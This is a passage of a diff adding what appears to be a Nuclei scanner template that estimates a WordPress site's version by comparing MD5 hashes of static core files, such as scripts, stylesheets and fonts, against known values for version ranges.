dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1a6d05f43ff7076b053b1802ecac92c3\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"a209401a035e188aaf75fe3392d48184\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"85752ca8c899aee3297e87479fd51994\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"12808b192ca103549dd90b62be9b144e\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"8d5e06994737d4e3e35fd0688151f55e\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"fed09c9b6be237c0fb4ba5c0468bb7ee\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"04e24483fe78930682a25e79adb99342\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"4c44e4da916e1604d58cdb6c662cf4d9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"d319d9d88ee8a04ea37abc078e8cf9b8\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"07fbdbde3eec108e5709caa94402475f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3325ebb49ad7b3dc830f93d8e385b255\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"30a8f714d12fb7119a0a6b24c448868d\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8868ded3f5e30dbaec5dbcb7bc104b0f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"826912016774df9daa3e21c24966ba4c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery-migrate.min.js" + matchers: + - type: dsl + name: 4.5.3 - 5.5.3 + dsl: + - "(\"7121994eec5320fbe6586463bf9651c2\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"e489bd9969f80e9ba1ca4737179884fe\" == md5(body))" + - type: dsl + name: 3.6 - 4.4.24 + dsl: + - "(\"512b871a2830e44259bc3ce3343afcd0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"79b4956b7ec478ec10244b5e2d33ac7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed-template.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: 
+ - "(\"d6c3fb049f657928eac2cd9c7eef6925\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ed541cbc74e8e5bb8b8d72160d335ddc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7d82adbb0596605c1916c47eea233a94\" == md5(body))" + - type: dsl + name: 5.1 - 5.5.3 + dsl: + - "(\"dbd0d1fb592c2e6eb891e7321206518b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b46c7133554eca3ae339ce3a5e45e0ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery-migrate.js" + matchers: + - type: dsl + name: 4.5.3 - 5.0.11 + dsl: + - "(\"6c57b762589f13ea5b3579ca5e6c369b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"00970611f0ee1cadf746d3770c111dea\" == md5(body))" + - type: dsl + name: 3.6 - 4.4.24 + dsl: + - "(\"90e237d5f01035b958feaf514ef27f7a\" == md5(body))" + - type: dsl + name: 5.1 - 5.5.3 + dsl: + - "(\"351c89ef1b09861916f4f022db000832\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c91800f536bebf3fd9b3f710b174d10d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed-template.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"c05d678a8197a72c4a44bf540017278a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fc394778444ed2c5e81d0f8e84f6542e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3391028c0cc005ab1761109496b535e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"133c315433779bc4804a93c209e7e023\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"dea9c532ff8aba0f1fdf7e27a1c29637\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c3a5dc58ab725e53d26fafb26b5e92e6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/api-request.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"eb5b88948b1755a4bb607c33f63c0096\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"b1ae1aa42eaf4df3fdc59777f5ec7437\" == 
md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8a0fadfcd419986aede647b929822406\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"fba259bfaa5b79101ee7873cfd8290bf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"08ae4a1169a18c4dbc57bfaeaa444a3f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b509442d92e813e382d582f90b2203fe\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"5a74de32f6b6dc6e4e6716845a839132\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"cceefa969cbff4bcacfa3a39ff48214c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6918ed92f82a791fdf6a38f726629b56\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"e8a7ffcfde36022642abee85dd4b629c\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"fcf78dfab422bd8cfcb95f716d7e0182\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"db82fc8e7e74da0fd4510ef2f001604b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"7cb42356da59917aef639d39a31ff6e4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"242281bf85fdfc3d237f7538719f0af0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9b15c1f9fbc142688edd4d027bb73f4b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1483e8e2916295845be85876b1419a81\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"47e23f3fd1381204bea0e6925770460b\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"166ff0336201e38114db7bad497d0b12\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6cc944795bebf3d0d0e95a743d89bc15\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/api-request.js" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8bab6e7977d3198174f6773395f2f570\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 
+ dsl: + - "(\"5ec7c2daa2cde305e46eb4fd32c9bc92\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a09e9e461e42babc0b6fb87ddab313b7\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"df2c6676318b083ca21d83fa24abc463\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"39a2f7bc0f1ec2dfbf473770367b9367\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data-controls.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"443383efa01f00f813069ec7346f11a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"922b13d84d5d0f131c343b7685def0ad\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"6cfd451bddd4ce114e4cc3617ea814ea\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d04d238f97bbc53c88d65bfc48b7f095\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e8338db52ac85b7ef7bc0d15bc906a47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data-controls.js" + matchers: + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"215fa4db1ef071180a48d29f0dff4d64\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a3758795a5c7a0515f3fcbabe492c41b\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"89f88142f4b2f677d730aff3fc3169ea\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5d11f0b5b980602c219feab70f1a4538\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c33545009a5ab7aa13d75db39e4fb7c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-post.min.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"a92828462403c43b71d05af005db85c3\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"1c76cbbb1460865658523caa86f05cba\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"22853923e49914e8cdf4dbdd4061bd8b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8650fc123b8fa812ec6fa89c062fb2d9\" == 
md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3425f7b1fec9b03e0ddbcea73787e5f1\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cc31e2a9fd4b5eafa00a735d3e20c4c1\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"167e7b26c864699559d930fc5ce72a7a\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"306b49c4726604b273860a46a7a69a96\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - "(\"4750da6cb226bcab5cec8cc02fcde273\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"7325a1809985c86395457c6e841e2ab3\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"ec79f4a3d602fc297468ee7db7d8516b\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"582cb222b9cae2de8778686fbd4480ba\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"c9afb166c5182641d222f47fa2bd1c83\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f1d32f222e77a360ff3c62d3a6ee223b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"e693d1b2a22c2cb3ab04dbfb2416c172\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ab9800198ab0358fee9eb0f20f8c439d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"105b6a4bd36ef53c65687b9392ceabad\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f3c5237e842ca29a5bba89ae4372784f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d10bc18ab7e8a367f41fe3f720c8ff63\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d8205a6571a691fabe5778430bd92715\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"0974d972c691fa8dec8e8612188e1568\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"86922662b6c4570d6536929cc8a014cb\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5663a0bb9d3aa47a519091db0db70dca\" == 
md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"10b5f68f1fb961fd9d8866675754862d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"5f555fd98462f48870e327d0e833fb9e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"cdafe4406388192aa647e64797366ad0\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"aa4bccbdc1f73b5b7854b11379ac7972\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"607b3440b51d60b6d0954fc07a42b98e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e5ba2c4ebfc7201bab031634a0d9bdae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"39a3cafa73d891260695fe68356ea308\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"bcfded1af21db1cdd0d49f32ddd77745\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6b148eae4202290641289889a11595bd\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e41f54aa8a8614768fd20f398856568\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"6165321c05c95b7d947f7bfd79c4126c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4d69c72a6b771829bdebfc72a91312b0\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"457d8351de9ec72ed4cdc16bf8d094ca\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2feabd4422aa451b9dda8249739804d8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4bd5df4898551b110d7a79ef5274d7c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/image-edit.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.4 + dsl: + - "(\"390732f55dfa7529b5bf612b79cdedbf\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"53286d003e3e19eacc26926f76c0d7df\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"cd559285783b61754b780372f9093f51\" == md5(body))" + - type: dsl + name: 4.4 - 
4.4.24 + dsl: + - "(\"a851d6478c2108a61fbdc74b33f9dcda\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"40c9a1866d7ab4aec2346e02d82f4758\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"df9254c728a075b313345528aa68355b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"0be84285d55ffcf75cc77e8fbd369d38\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"7d425b225fde8dde845621fac4160a6d\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9bf2c46c35fc9f3c9ef2069137efd686\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"8adcd44ebcd7a868786d8a228ac96a9f\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"8aefd8355be19a71bd7229f9ffb3517f\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"228d2d1f73335261a6ec6e41464cb5a9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"56db71c85951d868ec1242aaec00c37a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"616f8750a3708a6d30de5d0ecbf20eac\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"040ada6c2220f56f7d2d3500b768809a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"b9fdd6082449100b2d851ba9a2505829\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c423c74409e8b3a5821d6cc46b10bf15\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2730e4cb476c1255c108b23f85699b53\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-gallery.js" + matchers: + - type: dsl + name: 4.7 - 5.0.10 + dsl: + - "(\"d0809048874d234e35abae65dc17710a\" == md5(body))" + - type: dsl + name: 3.8 - 4.6.19 + dsl: + - "(\"7cf21db8661f9201a784f638f77d2b26\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.34 + dsl: + - "(\"365f0de914a67921ec1ca7f2c1f6c7fc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"75e959d883beb502e661572dd86d84f3\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.4 + dsl: + - 
"(\"875c61d7e23f27e63c483f1cfaa4d049\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.2 + dsl: + - "(\"07c7fe13aad9fd0975facf825ecce6b4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"fe92407c916ec408ca14ea3489ea1260\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.6 + dsl: + - "(\"b8fd6328bb26d1bfe5282dff92de14d5\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.4.4 + dsl: + - "(\"cedcad9d0ed2e3791e9e2fddd1c243e8\" == md5(body))" + - type: dsl + name: 5.1.7 - 5.3.6 + dsl: + - "(\"eea2b604309b22751dcca66cc8d632ba\" == md5(body))" + - type: dsl + name: 4.7.19 - 5.0.11 + dsl: + - "(\"dce3af6c5cfec53acfa8de54ba8b2f73\" == md5(body))" + - type: dsl + name: 3.8.35 - 4.6.20 + dsl: + - "(\"5e4d0bdf91b1c228a28c1ec4deb870c6\" == md5(body))" + - type: dsl + name: 3.7.35 + dsl: + - "(\"4be2c115bd13d75efb6ecd8301eeca2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-background.js" + matchers: + - type: dsl + name: 4.7 - 4.8.14 + dsl: + - "(\"f4ceff60e63046245443bc55ee7baba9\" == md5(body))" + - type: dsl + name: 3.8 - 4.6.19 + dsl: + - "(\"f26af7294ee07fb9a0cb88c2a8697623\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.34 + dsl: + - "(\"517aabb873f93a3ce7e5d6fa191bdbb9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c20d43ed14bb4784a28296e98e174afd\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f83425a586539ee867b165e4a94a54a8\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f5aa17555ab1dc09cf1ecca75e3e596e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2d5c840f364432114e1a5761a910afc5\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.10 + dsl: + - "(\"3e22f2941127d8ca57718fa7de91568b\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.4 + dsl: + - "(\"cc358c331f8258166040ec13020cac1f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.2 + dsl: + - "(\"04587d7b662f46d6098f03252254111f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - 
"(\"97ade5c88a76faf72762519bc30c9a03\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.6 + dsl: + - "(\"a1dfdf155fbb6ba80da54b9972b506a8\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.4.4 + dsl: + - "(\"38cf2f220ca17793ccd71e8d16d8486d\" == md5(body))" + - type: dsl + name: 5.1.7 - 5.3.6 + dsl: + - "(\"f99c35000beb3c31c8d8c50a1a26925d\" == md5(body))" + - type: dsl + name: 4.9.16 - 5.0.11 + dsl: + - "(\"c98d592e5df4a09d8657bc1aa8c89aa9\" == md5(body))" + - type: dsl + name: 4.7.19 - 4.8.15 + dsl: + - "(\"da12e436ee9fb945ec6a8bfee4fff3a7\" == md5(body))" + - type: dsl + name: 3.8.35 - 4.6.20 + dsl: + - "(\"bad20392d17f9d5f65d577deab13b542\" == md5(body))" + - type: dsl + name: 3.7.35 + dsl: + - "(\"be8eec5e57c66879f172eaf9e5ec762b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/lists/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c584630c3c2aee6040dc54f78658f380\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"951aff9ce655daa3fa7ef637b9841c9f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"ebb03e951bb87f4aa69a1328da082522\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"d38fe745364acb23d92b278bcdadcc76\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"89daaa512ec64685e43a7b8dc027e6b6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7948197f62adb44f10885de01cb569ec\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"a50a5f7469bc374bdf17a75c0cd4d98a\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"9007b591cde52e133de6a54490a4ea59\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b19b342c0b7e49d869254590e4b0df5b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"59443d279888d73242396855314096a3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b61f8a2c808b097aadd14c601d17f3c1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - 
"(\"4e754876049026025970fb07ee03af3e\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"49dc5b57b14ad1232a5ffb37d96370d3\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"2044a08452b145970ba8155e0f1e00fe\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"8a3d576259af5b0327177c43f63c3232\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"f27f6e413858324dfb9751a089df550d\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6e3aa443bc42227ce7afee73b8bb90ee\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"299f723fb54eaae381bc49b4a1712784\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/certificates/ca-bundle.crt" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"dd1c7bdebdfc411eb8a336e3d758692c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c3d19568d619663bd612ca5129c26c55\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"aab39209c0b97f2736d2270762c3624b\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"b6ea3b5f9b5cc919157579ecdefd7901\" == md5(body))" + - type: dsl + name: 3.9 - 4.3.25 + dsl: + - "(\"978976c7bbfab9219a6f0a8a66a4da6f\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"34120794e34a546b6de505bc6a89bcc2\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"d147a698ed8a7435c9e9b247947dff40\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8bf79be04d97a454855bd1874202faf1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/_mixins.scss" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1f5a52b31cf5aba613aa845f2db7ac9f\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"45226dc97aee32844ae5b2c7953c50f8\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"53e25fcbec91e57c9127342e6f2736ee\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - 
"(\"4b98278e5b5d5d8a5e3dbe6d246086ee\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0c671ea644e705d3ec65d2586dd48dfb\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"18d869c6a21b54fdf1038dadc8b62810\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"954efa737206be92e93d6b37e5b196c5\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"723a63056857f5f5f511f42f35782362\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5860c2c0a06f69f860481178fe83ba43\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.ttf" + matchers: + - type: dsl + name: 4.5 - 5.1.8 + dsl: + - "(\"8fea1fce46bafe469ba2f101fdc583e2\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"4e1e8fbebedb4172f1635a4cf29624e8\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"8a457a7b9d43377c070b0fe91732ed95\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"0405baf6fced62a8bc43c1c850a71228\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b2888b3f2157dade22fa872b83d5f7d0\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"d95c104c80bd6a47f25bc9c59b06a8ac\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"ece97919ac9f753c2ed3578d70c6e64c\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"f51888c22cfeae654d923aa37753f28e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1e37a8a1c2f7de7cb1afd8fba108875a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.eot" + matchers: + - type: dsl + name: 4.5 - 5.1.8 + dsl: + - "(\"30e410c715c6215fa7faa1c979b6480c\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"f379d2e99493ad79891d8300bf7a4a31\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"cea23664cbf4f6c9484411cbc651d983\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"51d3581d8ce7768f8dac4864012a5810\" == 
md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f2821f84ced7b3da403692069e60a5ca\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"8c4f9123fff2c332e0cbb4ca4b9d9c15\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"2702a00aa0b250258802454163f55d22\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e0eef7c2c85fd5996597c086a87c0ece\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d34e1a3e778ff0cb40e991522d2f59f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.svg" + matchers: + - type: dsl + name: 4.5 - 5.1.8 + dsl: + - "(\"780e6968cd0e378b1f7723d89fa59ab5\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"21e6b28a2d95d779f553565c7831c97d\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"0b7e1f9b2978e48c89f99c5befaf77f8\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"f9927f4ee56c9da2582fc659ea081c45\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"299c19436c4fd8efbfae957faf3a5865\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"ac42d06eda2d36f30d635619065ce9cd\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"1c7e93cbb4adc19d2d93774853614642\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"90b2bb03672d9f516946d43fd968d320\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"b4e45f9133245fc26e06a0f7358ed758\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"abc638f8cc1a449589f918924b890a3f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"94fc4b1b3b506fae95e65c01ec8060ad\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"435422a1529aa1a64a7e832de8c7201d\" == md5(body))" + - type: dsl + name: 4.5 - 